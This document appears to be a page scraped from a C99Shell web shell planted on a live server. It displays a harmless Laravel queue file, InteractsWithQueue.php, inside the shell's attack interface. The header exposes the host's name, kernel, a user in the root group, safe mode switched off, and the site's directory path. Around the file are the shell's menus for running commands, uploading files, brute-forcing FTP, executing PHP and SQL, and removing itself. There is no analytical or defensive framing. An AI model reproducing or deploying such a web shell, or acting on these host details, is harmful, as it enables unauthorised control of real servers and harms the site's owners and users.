!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html/vendor/laravel/framework/src/Illuminate/Queue/   drwxr-xr-x
Free 28.68 GB of 117.98 GB (24.31%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     InteractsWithQueue.php (2.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Queue;

use 
DateTimeInterface;
use 
Illuminate\Contracts\Queue\Job as JobContract;
use 
Illuminate\Support\InteractsWithTime;
use 
InvalidArgumentException;
use 
Throwable;

trait 
InteractsWithQueue
{
    use 
InteractsWithTime;

    
/**
     * The underlying queue job instance.
     *
     * @var \Illuminate\Contracts\Queue\Job|null
     */
    
public $job;

    
/**
     * Get the number of times the job has been attempted.
     *
     * @return int
     */
    
public function attempts()
    {
        return 
$this->job $this->job->attempts() : 1;
    }

    
/**
     * Delete the job from the queue.
     *
     * @return void
     */
    
public function delete()
    {
        if (
$this->job) {
            return 
$this->job->delete();
        }
    }

    
/**
     * Fail the job from the queue.
     *
     * @param  \Throwable|string|null  $exception
     * @return void
     */
    
public function fail($exception null)
    {
        if (
is_string($exception)) {
            
$exception = new ManuallyFailedException($exception);
        }

        if (
$exception instanceof Throwable || is_null($exception)) {
            if (
$this->job) {
                return 
$this->job->fail($exception);
            }
        } else {
            throw new 
InvalidArgumentException('The fail method requires a string or an instance of Throwable.');
        }
    }

    
/**
     * Release the job back into the queue after (n) seconds.
     *
     * @param  \DateTimeInterface|\DateInterval|int  $delay
     * @return void
     */
    
public function release($delay 0)
    {
        
$delay $delay instanceof DateTimeInterface
            
$this->secondsUntil($delay)
            : 
$delay;

        if (
$this->job) {
            return 
$this->job->release($delay);
        }
    }

    
/**
     * Set the base queue job instance.
     *
     * @param  \Illuminate\Contracts\Queue\Job  $job
     * @return $this
     */
    
public function setJob(JobContract $job)
    {
        
$this->job $job;

        return 
$this;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--